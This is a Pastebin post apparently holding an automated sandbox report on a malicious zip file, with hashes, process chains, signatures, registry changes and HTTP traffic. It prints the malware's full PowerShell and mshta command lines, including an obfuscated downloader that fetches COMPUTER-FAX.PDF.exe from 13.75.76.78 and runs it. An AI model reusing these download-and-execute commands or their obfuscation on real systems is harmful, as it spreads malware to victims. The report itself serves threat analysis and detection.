Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "Zips_3000925aed42fa86133ead0cb5279a66.zip"
- * File Size: 770
- * File Type: "Zip archive data, at least v2.0 to extract"
- * SHA256: "93a324f957aa65d1c00f4671d1ca34f2356a08c7a203c5140d562cbb360799ff"
- * MD5: "3000925aed42fa86133ead0cb5279a66"
- * SHA1: "9edd7e4b324de7d477d1c1d93b4b27446b580132"
- * SHA512: "eb73c257eb8238931a24315d98f8522ab11fde11373afac0b598f1555e8644d80408491f32b264232ffdf154fb0d8d2f3c4b20eb94337a0bfaa997336661e7da"
- * CRC32: "C38CA35B"
- * SSDEEP: "24:9uV9yGPlqDtb+nrHCUbCvnfHd5yF0rV9V:9uVRPlqDRaIfHd5yFIV7"
- * Process Execution:
- "cmd.exe",
- "powershell.exe",
- "mshta.exe",
- "powershell.exe",
- "eal.exe",
- "eal.exe"
- * Executed Commands:
- "\"C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$rp=stringchar@(0x68,0x74,0x74,0x70) -replace ' ','';$rp=$rp+'://13.75.76.78/stfx/out-454148433.hta';mshta $rp\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\COMPUTER-FAX.PDF.rtf.lnk ",
- "\"C:\\Windows\\system32\\mshta.exe\" http://13.75.76.78/stfx/out-454148433.hta",
- "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted -Window 1 void $null;$klfycmpwbxn = Get-Random -Min 3 -Max 4;$tghbrksc = (char(char97..char122));$ldezik = -join ($tghbrksc | Get-Random -Count $klfycmpwbxn | % Char$_);$nlsvfzk = char0x2e+char0x65+char0x78+char0x65;$cvxhpzmgsi = $ldezik + $nlsvfzk;$kacbuxfl=char0x53+char0x61+char0x4c;$egyfwhpqk=char0x49+char0x45+char0x58;$shknxqor=char0x73+char0x41+char0x70+char0x53;sAL nfjplmixa $kacbuxfl;$vwignqlmxb=char0x4e+char0x65+char0x74+char0x2e+char0x57+char0x65+char0x62+char0x43+char0x6c+char0x69+char0x65+char0x6e+char0x74;nfjplmixa zqyxmtflv $egyfwhpqk;$phawsqokijc=char0x24+char0x65+char0x6e+char0x76+char0x3a+char0x50+char0x55+char0x42+char0x4c+char0x49+char0x43|zqyxmtflv;nfjplmixa yzlpdtr $shknxqor;$hcnjbu = $phawsqokijc + char0x5c + $cvxhpzmgsi;;;;$ryvjobgep = 'aHR0cDovLzEzLjc1Ljc2Ljc4L3N0ZngvQ09NUFVURVItRkFYLlBERi5leGU=';$ryvjobgep=System.Text.Encoding::UTF8.GetString(System.Convert::FromBase64String($ryvjobgep));$himdak = New-Object $vwignqlmxb;$tjduoxf = $himdak.DownloadData($ryvjobgep);IO.File::WriteAllBytes($hcnjbu, $tjduoxf);yzlpdtr $hcnjbu;;$nyhscdv = @($puohyedcnzj, $tskea, $jfcvo, $pfiwgl);foreach($mxjhzsbwy in $nyhscdv)$null = $_\"\"",
- "powershell.exe -ExecutionPolicy UnRestricted -Window 1 void $null;$klfycmpwbxn = Get-Random -Min 3 -Max 4;$tghbrksc = (char(char97..char122));$ldezik = -join ($tghbrksc | Get-Random -Count $klfycmpwbxn | % Char$_);$nlsvfzk = char0x2e+char0x65+char0x78+char0x65;$cvxhpzmgsi = $ldezik + $nlsvfzk;$kacbuxfl=char0x53+char0x61+char0x4c;$egyfwhpqk=char0x49+char0x45+char0x58;$shknxqor=char0x73+char0x41+char0x70+char0x53;sAL nfjplmixa $kacbuxfl;$vwignqlmxb=char0x4e+char0x65+char0x74+char0x2e+char0x57+char0x65+char0x62+char0x43+char0x6c+char0x69+char0x65+char0x6e+char0x74;nfjplmixa zqyxmtflv $egyfwhpqk;$phawsqokijc=char0x24+char0x65+char0x6e+char0x76+char0x3a+char0x50+char0x55+char0x42+char0x4c+char0x49+char0x43|zqyxmtflv;nfjplmixa yzlpdtr $shknxqor;$hcnjbu = $phawsqokijc + char0x5c + $cvxhpzmgsi;;;;$ryvjobgep = 'aHR0cDovLzEzLjc1Ljc2Ljc4L3N0ZngvQ09NUFVURVItRkFYLlBERi5leGU=';$ryvjobgep=System.Text.Encoding::UTF8.GetString(System.Convert::FromBase64String($ryvjobgep));$himdak = New-Object $vwignqlmxb;$tjduoxf = $himdak.DownloadData($ryvjobgep);IO.File::WriteAllBytes($hcnjbu, $tjduoxf);yzlpdtr $hcnjbu;;$nyhscdv = @($puohyedcnzj, $tskea, $jfcvo, $pfiwgl);foreach($mxjhzsbwy in $nyhscdv)$null = $_\"\"",
- "C:\\Users\\Public\\eal.exe "
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details":
- "IP": "51.68.247.47:5201"
- "IP": "13.75.76.78:80"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "eal.exe"
- "process": "svchost.exe"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: eal.exe, pid: 1612, offset: 0x00000000, length: 0x00124c00"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "mshta.exe -> powershell.exe"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\Public\\eal.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://13.75.76.78/stfx/out-454148433.hta"
- "suspicious_request": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://13.75.76.78/stfx/out-454148433.hta"
- "url": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "eal.exe(1612) -> eal.exe(1776)"
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details":
- "file": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\:Zone.Identifier"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OyleztRHdq"
- "data": "C:\\Users\\Public\\OyleztRHdq.vbs"
- "Description": "Attempts to execute a powershell command with suspicious parameter/s",
- "Details":
- "execution_policy": "Attempts to bypass execution policy"
- "Description": "Attempts to modify proxy settings",
- "Details":
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "dropped": "clamav:Win.Malware.Autoit-7093532-0, sha256:8a5c38eadda65c3aad60d2a237da315c0a0dd1848bbbf46ed616edf073dff1fc , guest_paths:C:\\Users\\user\\klist\\acledit.bat, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Malware.Autoit-7093532-0, sha256:cfc4e5af31c58b772eb4ee6f09129373ea7d625c8107f4432b293e981ddfbf51 , guest_paths:C:\\Users\\Public\\eal.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Trojan.VBAgent-6647891-0, sha256:cef129fe2f232215e51e51b5cf19ce9bc87ea29bfc7c2e9fe77fa77b6d94c42b , guest_paths:C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\out-4541484331.hta, type:HTML document, ASCII text, with very long lines, with CRLF, LF line terminators"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199"
- "signature": "ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl"
- * Started Service:
- * Mutexes:
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "Local\\WininetStartupMutex",
- "Local\\WininetConnectionMutex",
- "Local\\WininetProxyRegistryMutex",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Global\\.net clr networking"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\COMPUTER-FAX.PDF.rtf.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\21RXW1QFVJB9C0N970MW.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\409ef0e3b242f688.customDestinations-ms",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\out-4541484331.hta",
- "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RTISJY1UL340ONLJM5WP.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Users\\Public\\eal.exe",
- "C:\\Users\\user\\klist\\acledit.bat",
- "C:\\Users\\Public\\OyleztRHdq.vbs"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\21RXW1QFVJB9C0N970MW.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2996.3842781",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2996.3842781",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2996.3842781",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RTISJY1UL340ONLJM5WP.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2924.4735953",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2924.4735953",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2924.4735953",
- "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\:Zone.Identifier"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powershell_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileDirectory",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OyleztRHdq",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\1U780W5Z52"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL"
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://13.75.76.78/stfx/out-454148433.hta",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "13.75.76.78",
- "version": "1.1",
- "path": "/stfx/out-454148433.hta",
- "data": "GET /stfx/out-454148433.hta HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 13.75.76.78\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe",
- "user-agent": "",
- "method": "GET",
- "host": "13.75.76.78",
- "version": "1.1",
- "path": "/stfx/COMPUTER-FAX.PDF.exe",
- "data": "GET /stfx/COMPUTER-FAX.PDF.exe HTTP/1.1\r\nHost: 13.75.76.78\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Add Comment
Please, Sign In to add comment